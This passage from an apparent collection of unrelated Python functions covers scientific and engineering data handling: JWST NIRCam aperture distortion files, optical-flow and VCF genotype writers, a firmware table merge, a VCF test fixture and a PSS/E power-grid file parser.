'mm_to_pixels':'NIRCAMASWToNIRCAMASW_2_20161025081547',\n 'pixels_to_mm':'NIRCAMASW_2ToNIRCAMASW_20161025081547',\n 'mm_to_degrees':'NIRCAMASW_BARToOTESKY_202005150434',\n },\n 'NRCA3_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BARNC_202110261138',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_3_20161025081552',\n 'pixels_to_mm':'NIRCAMASW_3ToNIRCAMASW_20161025081552',\n 'mm_to_degrees':'NIRCAMASW_BARNCToOTESKY_202110261138',\n },\n 'NRCA4_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BAR_202005150434',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_4_20161025081557',\n 'pixels_to_mm':'NIRCAMASW_4ToNIRCAMASW_20161025081557',\n 'mm_to_degrees':'NIRCAMASW_BARToOTESKY_202005150434',\n },\n 'NRCA5_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMALW_RND_202005150434',\n 'mm_to_pixels':'NIRCAMALWToNIRCAMALW_1_20161227162042',\n 'pixels_to_mm':'NIRCAMALW_1ToNIRCAMALW_20161227162042',\n 'mm_to_degrees':'NIRCAMALW_RNDToOTESKY_202005150434',\n },\n 'NRCA5_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMALW_BAR_202005150434',\n 'mm_to_pixels':'NIRCAMALWToNIRCAMALW_1_20161227162042',\n 'pixels_to_mm':'NIRCAMALW_1ToNIRCAMALW_20161227162042',\n 'mm_to_degrees':'NIRCAMALW_BARToOTESKY_202005150434',\n }\n }\n\n # coldfit_source_data_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument, '{}'.format('cold_fit_201703071210.csv'))\n coldfit_source_data_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument, '{}'.format('nircam_cold_fit.txt'))\n print('NIRCam coldfit data from', coldfit_source_data_file)\n t = open(coldfit_source_data_file)\n coldfit_source_data = t.readlines()\n t.close()\n # remove comments from read content\n coldfit_source_data = [line for line in coldfit_source_data if line[0] != '#']\n\n siaf_detector_layout = iando.read.read_siaf_detector_layout()\n # siaf_alignment_parameters = iando.read.read_siaf_alignment_parameters(instrument)\n siaf_aperture_definitions = iando.read.read_siaf_aperture_definitions(instrument)\n # aperture_dict = {}\n aperture_name_list = siaf_aperture_definitions['AperName'].tolist()\n\n # generate alignment reference file, one file for all master apertures\n outfile = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_alignment.txt'.format(instrument.lower()))\n siaf_alignment = Table()\n\n for AperName in aperture_name_list:\n\n # process the master apertures of NIRCam\n if AperName in siaf_detector_layout['AperName']:\n (A, B, C, D, betaX, betaY, V2Ref, V3Ref) = nircam_get_polynomial_both(AperName, siaf_aperture_definitions, coldfit_name_mapping, coldfit_source_data)\n\n #generate distortion reference file\n number_of_coefficients = len(A)\n polynomial_degree = int((np.sqrt(8 * number_of_coefficients + 1) - 3) / 2)\n siaf_index = []\n exponent_x = []\n exponent_y = []\n for i in range(polynomial_degree + 1):\n for j in np.arange(i + 1):\n siaf_index.append('{:d}{:d}'.format(i, j))\n exponent_x.append(i - j)\n exponent_y.append(j)\n\n distortion_reference_table = Table((siaf_index, exponent_x, exponent_y, A, B, C, D), names=(\n 'siaf_index', 'exponent_x', 'exponent_y', 'Sci2IdlX', 'Sci2IdlY', 'Idl2SciX', 'Idl2SciY'))\n distortion_reference_table.add_column(\n Column([AperName] * len(distortion_reference_table), name='AperName'), index=0)\n distortion_reference_file_name = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_distortion_{}.txt'.format(instrument.lower(),\n AperName.lower()))\n # distortion_reference_table.pprint()\n comments = []\n comments.append('{} distortion reference file for SIAF\\n'.format(instrument))\n comments.append('Aperture: {}\\n'.format(AperName))\n comments.append('Based on coefficients given in {},'.format(os.path.basename(coldfit_source_data_file)))\n # comments.append('that were rescaled, shifted for a different reference pixel location, and rotated:')\n # comments.append('Rotation of {:2.3f} deg was removed and is carried separately in V3IdlYangle.'.format(\n # np.rad2deg(V3angle))) # *units.deg.to(units.arcsecond)\n # if 'may_2015' in distortion_file_name:\n # comments.append(\n # 'These parameters are stored in the currently (January 2018) active SIAF (PRDOPSSOC-G-012). ')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n distortion_reference_table.meta['comments'] = comments\n distortion_reference_table.write(distortion_reference_file_name, format='ascii.fixed_width',\n delimiter=',', delimiter_pad=' ', bookend=False, overwrite=True)\n\n V3SciYAngle = betaY\n V3SciXAngle = betaX\n if np.abs(V3SciYAngle) < 90.:\n V3IdlYAngle = V3SciYAngle\n else:\n V3IdlYAngle = V3SciYAngle - np.sign(V3SciYAngle) * 180.\n\n if len(siaf_alignment) == 0: # first entry\n siaf_alignment['AperName'] = ['{:>30}'.format(AperName)]\n siaf_alignment['V3IdlYAngle'] = [V3IdlYAngle]\n siaf_alignment['V3SciXAngle'] = V3SciXAngle #[np.rad2deg(betaX)]\n siaf_alignment['V3SciYAngle'] = V3SciYAngle #[np.rad2deg(betaY)]\n siaf_alignment['V2Ref'] = [V2Ref]\n siaf_alignment['V3Ref'] = [V3Ref]\n else:\n siaf_alignment.add_row(['{:>30}'.format(AperName), V3IdlYAngle, V3SciXAngle, V3SciYAngle, V2Ref,V3Ref])\n comments = []\n comments.append('{} alignment parameter reference file for SIAF'.format(instrument))\n comments.append('')\n comments.append('This file contains the focal plane alignment parameters of master apertures calibrated')\n comments.append('during FGS-SI alignment.')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n siaf_alignment.meta['comments'] = comments\n siaf_alignment.write(outfile, format='ascii.fixed_width', delimiter=',',\n delimiter_pad=' ', bookend=False, overwrite=True)", "def writeFlow(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def write_to_vcf(self):\n\n # 1. Generate header info\n date_for_vcf = datetime.now().strftime('%Y%m%d')\n header_info = [\n '##fileformat=VCFv4.2',\n '##fileDate=%s' % date_for_vcf,\n '##source=%s' % self.get_analyser_name(),\n '##reference=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/bigZips/hg38.fa.gz',\n '##contig=<ID=chr1,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr1.fa.gz>',\n '##contig=<ID=chr2,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr2.fa.gz>',\n '##contig=<ID=chr3,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr3.fa.gz>',\n '##contig=<ID=chr4,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr4.fa.gz>',\n '##contig=<ID=chr5,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr5.fa.gz>',\n '##contig=<ID=chr6,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr6.fa.gz>',\n '##contig=<ID=chr7,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr7.fa.gz>',\n '##contig=<ID=chr8,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr8.fa.gz>',\n '##contig=<ID=chr9,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr9.fa.gz>',\n '##contig=<ID=chr10,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr10.fa.gz>',\n '##contig=<ID=chr11,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr11.fa.gz>',\n '##contig=<ID=chr12,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr12.fa.gz>',\n '##contig=<ID=chr13,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr13.fa.gz>',\n '##contig=<ID=chr14,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr14.fa.gz>',\n '##contig=<ID=chr15,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr15.fa.gz>',\n '##contig=<ID=chr16,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr16.fa.gz>',\n '##contig=<ID=chr17,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr17.fa.gz>',\n '##contig=<ID=chr18,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr18.fa.gz>',\n '##contig=<ID=chr19,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr19.fa.gz>',\n '##contig=<ID=chr20,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr20.fa.gz>',\n '##contig=<ID=chr21,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr21.fa.gz>',\n '##contig=<ID=chr22,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chr22.fa.gz>',\n '##contig=<ID=chrM,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chrM.fa.gz>',\n '##contig=<ID=chrX,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chrX.fa.gz>',\n '##contig=<ID=chrY,URL=https://hgdownload.soe.ucsc.edu/goldenPath/hg38/chromosomes/chrY.fa.gz>',\n ]\n header_parameters = [\n '##FORMAT=<ID=GT,Number=1,Type=String,Description=\"Genotype\">',\n '##FORMAT=<ID=MTQ,Number=1,Type=String,Description=\"MassArray Typer quality value for SNP call. '\n 'A=Conservative, B=Moderate, C=Aggressive, D=Low Probability, E=User Call, i=Low Intensity. A and B are considered high '\n 'quality scores.\">',\n '##INFO=<ID=PCR,Number=2,Type=String,Description=\"PCR sequences used in assay.\">',\n '##INFO=<ID=AF,Number=A,Type=Float,Description=\"Minor allele frequency from population data.\">',\n '##INFO=<ID=Gene,Number=A,Type=String,Description=\"HGNC Gene Name for gene containing SNP.\">',\n '##INFO=<ID=Build,Number=A,Type=String,Description=\"Genome build used to determine SNP position for assay.\">',\n '##FILTER=<ID=LowCallRate,Description=\"SNP not called in at least 30% of samples in assay.\">',\n ]\n\n # 2. Extract info from XML file\n results = self.get_results()\n snps = self.get_snps()\n pcr_sequences = self.get_pcr_sequences()\n call_rates = self.get_snp_call_rate()\n\n # 3. For each sample, create VCF, add headers, determine genotype of each SNP and write to file.\n for sample, variants in results.items():\n\n with open(os.path.join(self.output, '%s.vcf' % sample), 'w+') as outfile:\n\n header_fields = ['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', str(sample)]\n\n outfile.write('%s\\n' % '\\n'.join(header_info))\n outfile.write('%s\\n' % '\\n'.join(header_parameters))\n outfile.write('#%s\\n' % '\\t'.join(header_fields))\n\n # for each variant, make a line to add to the file which will\n # then be sorted\n lines_to_write = []\n for snp, info in variants.items():\n\n ref_allele = snps[snp]['ref']\n alt_alleles = snps[snp]['alt']\n alt_list = alt_alleles.split(',')\n\n # Genotype formatting matches VCF v4.0 spec where ./. is no call.\n gt_list = []\n called_genotype = info['genotype']\n if not called_genotype:\n gt_list = ['.', '.']\n elif len(called_genotype) == 1:\n called_genotype += called_genotype\n for allele in list(called_genotype):\n if allele == ref_allele:\n gt_list.append(0)\n else:\n if allele in alt_list:\n idx = alt_list.index(allele)\n gt_list.append(idx + 1)\n else:\n raise ValueError(\n 'Called genotype %s not provided as possible alt in bed file. Sample %s and SNP '\n '%s %s.' % (called_genotype, sample, snp, alt_alleles)\n )\n gt = '/'.join([str(x) for x in gt_list])\n\n # Threshold currently set to 0.3 (70% results have a call).\n snp_call_rate = call_rates[snp]\n if snp_call_rate >= 0.3:\n vcf_filter = 'LowCallRate'\n else:\n vcf_filter = 'PASS'\n\n snp_pcr_seqs = pcr_sequences[snp]\n\n lines_to_write.append(\n '{chr}\\t{pos}\\t{id}\\t{ref}\\t{alt}\\t.\\t{filter}\\tAF={af};PCR={pcr};Gene={gene};Build={build}\\t'\n 'GT:MTQ\\t{gt}:{qual}\\n'.format(\n chr=snps[snp]['chrom'],\n pos=snps[snp]['pos'],\n id=snp,\n ref=ref_allele,\n alt=alt_alleles,\n filter=vcf_filter,\n af=snps[snp]['maf'],\n pcr=','.join(snp_pcr_seqs),\n gene=snps[snp]['gene'],\n build=snps[snp]['genome_build'],\n gt=gt,\n qual=','.join(info['quality'])\n )\n )\n\n sorted_lines_to_write = sorted(\n lines_to_write,\n key=lambda x: (\n # first key for sorting is the int value of chr\n int(x.split('\\t')[0][3:]),\n # second key for sorting is the position of the variant\n int(x.split('\\t')[1])\n )\n )\n\n for line in sorted_lines_to_write:\n outfile.write(line)", "def main(input_file, dtb_file):\n\n LOGGER.info(\"Reading: %s\" % dtb_file)\n with open(dtb_file, \"rb\") as max_table_file:\n LOGGER.info(\"max10_device_table.bin size: %x\" %\n os.path.getsize(max_table_file.name))\n LOGGER.info(\"Max max10 table size: %x\" % MAX10_TABLE_SIZE)\n if (os.path.getsize(max_table_file.name) > MAX10_TABLE_SIZE):\n raise Exception(LOGGER.error(\"max10_device_table.bin is too big\"))\n max10_table = max_table_file.read()\n\n LOGGER.info(\"Writing file: %s\" % input_file)\n with open(input_file, \"rb+\") as rpd_file:\n rpd_file.seek(MAX10_TABLE_START)\n rpd_file.write(bytearray(max10_table))\n LOGGER.info(\"Done merging Max10 device table\")", "def sample_vcf():\n file_content = b\"\"\"##fileformat=VCFv4.2\n##hailversion=0.2.100-2ea2615a797a\n##INFO=<ID=QUALapprox,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=SB,Number=.,Type=Integer,Description=\"\">\n##INFO=<ID=MQ,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=MQRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=VarDP,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=AS_ReadPosRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_pab_max,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_QD,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_MQ,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=QD,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_MQRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=FS,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_FS,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=ReadPosRankSum,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=AS_QUALapprox,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=AS_SB_TABLE,Number=.,Type=Integer,Description=\"\">\n##INFO=<ID=AS_VarDP,Number=1,Type=Integer,Description=\"\">\n##INFO=<ID=AS_SOR,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=SOR,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=singleton,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=transmitted_singleton,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=omni,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=mills,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=monoallelic,Number=0,Type=Flag,Description=\"\">\n##INFO=<ID=AS_VQSLOD,Number=1,Type=Float,Description=\"\">\n##INFO=<ID=InbreedingCoeff,Number=1,Type=Float,Description=\"\">\n##FILTER=<ID=AC0,Description=\"Allele count is zero after filtering out low-confidence genotypes (GQ < 20; DP < 10; and AB < 0.2 for het calls)\">\n##FILTER=<ID=AS_VQSR,Description=\"Failed VQSR filtering thresholds of -2.7739 for SNPs and -1.0606 for indels\">\n##contig=<ID=chr1,length=248956422,assembly=GRCh38>\n#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\nchr1\t10330\t.\tCCCCTAACCCTAACCCTAACCCTACCCTAACCCTAACCCTAACCCTAACCCTAA\tC\t.\tPASS\tQUALapprox=21493;SB=325,1077,113,694;MQ=32.1327;MQRankSum=0.720000;VarDP=2236;AS_ReadPosRankSum=-0.736000;AS_pab_max=1.00000;AS_QD=5.17857;AS_MQ=29.5449;QD=9.61225;AS_MQRankSum=0.00000;FS=8.55065;AS_FS=.;ReadPosRankSum=0.727000;AS_QUALapprox=145;AS_SB_TABLE=325,1077,2,5;AS_VarDP=28;AS_SOR=0.311749;SOR=1.48100;singleton;AS_VQSLOD=13.4641;InbreedingCoeff=-0.000517845\"\"\"\n file = io.BytesIO(file_content)\n return file", "def read(file):\n\n blocks = ['bus', 'load', 'fshunt', 'gen', 'branch', 'transf', 'area',\n 'twotermdc', 'vscdc', 'impedcorr', 'mtdc', 'msline', 'zone',\n 'interarea', 'owner', 'facts', 'swshunt', 'gne', 'Q']\n nol = [1, 1, 1, 1, 1, 4, 1,\n 0, 0, 0, 0, 0, 1,\n 0, 1, 0, 0, 0, 0]\n rawd = re.compile('rawd\\d\\d')\n\n retval = True\n version = 0\n b = 0 # current block index\n raw = {}\n for item in blocks:\n raw[item] = []\n\n data = []\n mdata = [] # multi-line data\n mline = 0 # line counter for multi-line models\n\n # parse file into raw with to_number conversions\n fid = open(file, 'r')\n for num, line in enumerate(fid.readlines()):\n line = line.strip()\n if num == 0: # get basemva and frequency\n data = line.split('/')[0]\n data = data.split(',')\n\n mva = float(data[1])\n freq = float(data[5])\n version = int(data[2])\n\n if not version:\n version = int(rawd.search(line).group(0).strip('rawd'))\n if version < 32 or version > 33:\n logging.warning('RAW file version is not 32 or 33. Error may occur.')\n continue\n elif num == 1: # store the case info line\n logging.info(line)\n continue\n elif num == 2:\n continue\n elif num >= 3:\n if line[0:2] == '0 ' or line[0:3] == ' 0 ': # end of block\n b += 1\n continue\n elif line[0] is 'Q': # end of file\n break\n data = line.split(',')\n\n data = [to_number(item) for item in data]\n mdata.append(data)\n mline += 1\n if mline == nol[b]:\n if nol[b] == 1:\n mdata = mdata[0]\n raw[blocks[b]].append(mdata)\n mdata = []\n mline = 0\n fid.close()\n\n # add device elements params and add to PSAT formatted dictionary\n\n for data in raw['bus']:\n \"\"\"version 32:\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10\n ID, NAME, BasekV, Type, Area Zone Owner Va, Vm, latitude longitude\n \"\"\"\n idx = data[0]\n ty = data[3]\n angle = data[8]\n try:\n lat = data[9]\n except:\n # logging.warning('<No Coordinates in .raw file>')\n param = {'idx': idx,\n 'name': data[1],\n 'Vn': data[2],\n 'type': data[3],\n 'area': data[4],\n 'voltage': data[7],\n 'region': data[5],\n 'owner': data[6],\n 'angle': angle,\n }\n psatlist = [data[0], data[2], data[7], angle, data[4], data[5]]\n else:\n param = {'idx': idx,\n 'name': data[1],\n 'Vn': data[2],\n 'type': data[3],\n 'area': data[4],\n 'voltage': data[7],\n 'region': data[5],\n 'owner': data[6],\n 'angle': angle,\n 'latitude': data[9],\n 'longitude': data[10]\n }\n psatlist = [data[0], data[2], data[7], angle, data[4], data[5], data[9], data[10]]\n Settings.Bus.append(psatlist)\n Settings.BusNames.append(data[1])\n # Add BusSTORE Dictionary For Later Reference\n Settings.BusStore[idx] = param\n\n xcoord = [34.560040, 34.938385, 34.360040, 40.5152473, 40.3142473, 36.527401, 36.857401, 36.687401, 36.856401,\n 40.487041, 36.903901, 36.702901, 35.832561, 33.386047, 33.185047, 37.105571, 37.104154, 33.706718,\n 37.103549, 36.703539, 37.103559, 36.703549, 36.033561, 35.631561, 36.032561, 35.732561, 36.525401,\n 36.857401, 49.869314, 50.969314, 51.979314, 52.481674, 54.973192, 56.276212, 41.734596, 34.551015,\n 34.652015, 34.537507, 34.587507, 34.157904, 33.714453, 33.762453, 39.548160, 39.496160, 34.313143,\n 34.545782, 34.380686, 34.111686, 34.137762, 34.118650, 34.158650, 33.918650, 33.718650, 34.018650,\n 34.018650, 34.018650, 34.018650, 34.018650, 34.312456, 34.315456, 34.243600, 34.566258, 34.565258,\n 46.064672, 46.565672, 45.514571, 45.606833, 45.806833, 44.890000, 45.596416, 45.295416, 45.891161,\n 47.954899, 46.511440, 45.913936, 45.713936, 46.669335, 47.954899, 47.624154, 43.784730, 44.482350,\n 42.006860, 42.934919, 42.731919, 43.013135, 44.068350, 43.558350, 42.438350, 42.938350, 44.068350,\n 43.558350, 43.048350, 42.638350, 44.068350, 43.558350, 43.048350, 42.638350, 43.620189, 39.120428,\n 40.398031, 35.216200, 35.215200, 36.202099, 39.777745, 39.539598, 37.052929, 35.403217, 35.352217,\n 36.807243, 39.567450, 40.807689, 40.806689, 41.008689, 39.555494, 37.954721, 38.406721, 38.906721,\n 38.656721]\n ycoord = [-109.277313, -110.303798, -109.777313, -107.546455, -107.546455, -108.325669, -108.654569, -108.486669,\n -108.325669, -107.185575, -111.390408, -111.390408, -111.448566, -112.860397, -112.659397, -108.243555,\n -108.441191, -112.322033, -111.590816, -111.190816, -111.190816, -111.590806, -111.648566, -111.248566,\n -111.249566, -111.647566, -108.655669, -108.323669, -122.150895, -122.150895, -122.150895, -121.61684,\n -121.924221, -122.21370, -108.790427, -117.568105, -117.538105, -118.607375, -118.658375, -118.280282,\n -118.146319, -118.096319, -112.52797, -112.72797, -118.690631, -118.389938, -118.478496, -118.478496,\n -118.299917, -118.095428, -118.095428, -118.095428, -118.095428, -118.195428, -118.395428, -117.995428,\n -117.795428, -117.995428, -118.481217, -118.891217, -118.391667, -117.166428, -117.368428, -106.60906,\n -106.80906, -122.681289, -121.114785, -122.113785, -123.29000, -121.312202, -121.114202, -106.612578,\n -118.997945, -112.88531, -120.692286, -120.693974, -119.571501, -120.997945, -122.219492, -118.77463,\n -121.019484, -121.316546, -114.419206, -114.419206, -120.956476, -120.79484, -120.93484, -121.216546,\n -121.156546, -121.215484, -121.135484, -121.255484, -121.175484, -121.013484, -120.733484, -121.053484,\n -120.973484, -118.865882, -122.073631, -122.263453, -120.847567, -120.900567, -120.129849, -122.142965,\n -122.262993, -121.021929, -119.450452, -119.450452, -121.779037, -122.276225, -122.135718, -121.935718,\n -121.935718, -121.24000, -121.18379, -121.10879, -121.27379, -121.23979]\n\n #for idx, line in enumerate(Settings.Bus):\n # line.extend([xcoord[idx], ycoord[idx]])\n\n maxV = 1.1\n minV = 0.9\n maxQ = 1\n minQ = 0\n convimp = 0\n status = 1\n loss = 1\n\n for data in raw['load']:\n \"\"\"version 32:\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11\n Bus, Id, Status, Area, Zone, PL(MW), QL (MW), IP, IQ, YP, YQ, OWNER\n \"\"\"\n\n busidx = data[0]\n vn = Settings.BusStore[busidx]['Vn']\n voltage = Settings.BusStore[busidx]['voltage']\n param = {'bus': busidx,\n 'Vn': vn,\n 'Sn': mva,\n 'p': (data[5] + data[7] * voltage + data[9] * voltage ** 2) / mva,\n 'q': (data[6] + data[8] * voltage - data[10] * voltage ** 2) / mva,\n 'owner': data[11],\n 'type': Settings.BusStore[busidx]['type'],\n 'voltage': voltage\n }\n\n psatlist = [busidx, mva, vn, param['p'], param['q'], maxV, minV, convimp, status]\n Settings.PQ.append(psatlist)\n \"\"\"CONFIRM THAT OTHER BUSES HAVE 0 P and 0 Q which are not added\"\"\"\n\n for data in raw['fshunt']:\n \"\"\"\n 0, 1, 2, 3, 4\n Bus, name, Status, g (MW), b (Mvar)\n \"\"\"\n busidx = data[0]\n vn = Settings.BusStore[busidx]['Vn']\n param = {'bus': busidx,\n 'Vn': vn,\n 'status': data[2],\n 'Sn': mva,\n 'g': data[3] / mva,\n 'b': data[4] / mva,\n }\n\n psatlist = [busidx, mva, vn, freq, param['g'], param['b'], param['status']]\n Settings.Shunt.append(psatlist)\n\n gen_idx = 0\n type = 6\n\n for data in raw['gen']:\n \"\"\"\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11, 12, 13, 14, 15, 16,17,18,19\n I,ID,PG,QG,QT,QB,VS,IREG,MBASE,ZR,ZX,RT,XT,GTAP,STAT,RMPCT,PT,PB,O1,F1\n \"\"\"\n busidx = data[0]\n vn = Settings.BusStore[busidx]['Vn']\n gen_mva = data[8]\n gen_idx += 1\n status = data[14]\n leak = 0\n param = {'Sn': gen_mva,\n 'Vn': vn,\n 'u': status,\n 'idx': gen_idx,\n 'bus': busidx,\n 'pg': status * data[2] / mva,\n 'qg': status * data[3] / mva,\n 'qmax': data[4] / mva,\n 'qmin': data[5] / mva,\n 'v0': data[6],\n 'ra': data[9], # ra armature resistance\n 'xs': data[10], # xs synchronous reactance\n 'pmax': data[16] / mva,\n 'pmin': data[17] / mva,\n }\n\n if Settings.BusStore[busidx]['type'] == 3: #Check Bus Type for Slack\n refangle = 0\n refBus = 1\n PGuess = 1\n swlist = [busidx, gen_mva, vn, param['v0'], refangle, param['qmax'], param['qmin'],\n maxV, minV, PGuess, loss, refBus, status]\n SW = swlist\n Settings.SW.append(swlist)\n Settings.SWStore[busidx] = param\n Settings.SynStore[busidx] = param\n continue\n\n if busidx not in Settings.BusStore.keys():\n \"\"\" Need data from .dyr file. Create initial list, then append data from .dyr\"\"\"\n else:\n # psatlist = [busidx, gen_mva, vn, freq, type, leak, param['ra'],param['xs']]\n # Syn.append(psatlist)\n Settings.SynStore[busidx] = param\n pvlist = [busidx, gen_mva, vn, param['pg'], Settings.BusStore[busidx]['voltage'],\n param['qmax'], param['qmin'], maxV, minV, loss, status]\n Settings.PV.append(pvlist)\n\n\n for data in raw['branch']:\n \"\"\"\n I,J,ID,R,X,B,RATEA,RATEB,RATEC,GI,BI,GJ,BJ,ST,LEN,O1,F1,...,O4,F4\n \"\"\"\n param = {'bus1': data[0],\n 'bus2': data[1],\n 'id' : data[2],\n 'r': data[3],\n 'x': data[4],\n 'b': data[5],\n 'rate_a': data[6],\n 'rate_b': data[7],\n 'rate_c': data[8],\n 'Vn': Settings.BusStore[data[0]]['Vn'],\n 'Vn2': Settings.BusStore[data[1]]['Vn'],\n 'length': data[14],\n 'Ilim': EMPTY,\n 'Plim': EMPTY,\n 'Slim': EMPTY,\n 'status': data[13]\n }\n\n psatlist = [param['bus1'], param['bus2'], param['rate_c'], param['Vn'], freq, EMPTY,\n param['length'], param['r'], param['x'], param['b'], param['Ilim'], param['Plim'], EMPTY, EMPTY,\n param['Slim'], param['status']]\n Settings.Lineij.append([data[0], data[1], data[2]])\n Settings.Lineji.append([data[1], data[0], data[2]])\n Settings.LineOrd[param['bus1']].append(psatlist)\n Settings.branches += 1\n Settings.linecount += 1\n Settings.LineBusMatij[param['bus2']].append(Settings.branches)\n Settings.LineBusMatji[param['bus1']].append(Settings.branches)\n\n for data in raw['transf']:\n \"\"\"\n I,J,K,CKT,CW,CZ,CM,MAG1,MAG2,NMETR,'NAME',STAT,O1,F1,...,O4,F4\n R1-2,X1-2,SBASE1-2\n WINDV1,NOMV1,ANG1,RATA1,RATB1,RATC1,COD1,CONT1,RMA1,RMI1,VMA1,VMI1,NTP1,TAB1,CR1,CX1\n WINDV2,NOMV2\n \"\"\"\n if len(data[1]) < 5:\n ty = 2\n else:\n ty = 3\n if ty == 3:\n continue\n # raise NotImplementedError('Three-winding transformer not implemented')\n\n tap = data[2][0]\n phi = data[2][2]\n\n if tap == 1 and phi == 0:\n trasf = False\n else:\n trasf = True\n param = {'trasf': trasf,\n 'bus1': data[0][0],\n 'bus2': data[0][1],\n 'u': data[0][11],\n 'b': data[0][8],\n 'r': data[1][0],\n 'x': data[1][1],\n 'tap': tap,\n 'phi': phi,\n 'rate_a': data[2][3],\n 'Vn': Settings.BusStore[busidx]['Vn'],\n 'Vn2': Settings.BusStore[busidx]['Vn'],\n # 'length': data[?][?], FIND CORRECT INDEX\n 'Ilim': EMPTY,\n 'Plim': EMPTY,\n 'Slim': EMPTY,\n }\n psatlist = [param['bus1'], param['bus2'], param['rate_a'], param['Vn'], freq, EMPTY,\n EMPTY, param['r'], param['x'], param['b'], param['Ilim'], param['Plim'], EMPTY, EMPTY,\n param['Slim'], param['u']]\n\n Settings.LineOrd[param['bus1']].append(psatlist)\n Settings.linecount += 1\n Settings.transformers += 1\n # ADD Line Data(All Branch Types) to Sys Param Dict after .dyr Transformer Data Added\n # Re-Order Line Data for correct sequence\n for key in Settings.LineOrd:\n for item in Settings.LineOrd[key]:\n Settings.Line.append(item)\n\n for data in raw['area']:\n Settings.Areas.append(data[4])\n\n for data in raw['zone']:\n Settings.Regions.append(data[1])\n\n return retval", "def main(file):\n\n # Get the current working directory.\n here = os.getcwd()\n #Need the file_name to set globe, so that other functions can access to it.\n global file_name\n # Spite the Input into file_path and file_name.\n file_path = spilt_path(file)[0]\n file_name = spilt_path(file)[1]\n\n # Try to get into the file_path, if exist\n try:\n os.chdir(file_path)\n except IOError, e:\n print e\n\n # Now convert it\n convertFile(file_name)\n # going back to orgin folder\n os.chdir(here)\n return os.path.join(output_dir, file_name)", "def load_spectrum(inputfile):\n if inputfile.endswith(\"fits\"):\n wav, flux = spectrum_sdss_fits(inputfile)\n imodel = False\n inu = False\n\n else:\n 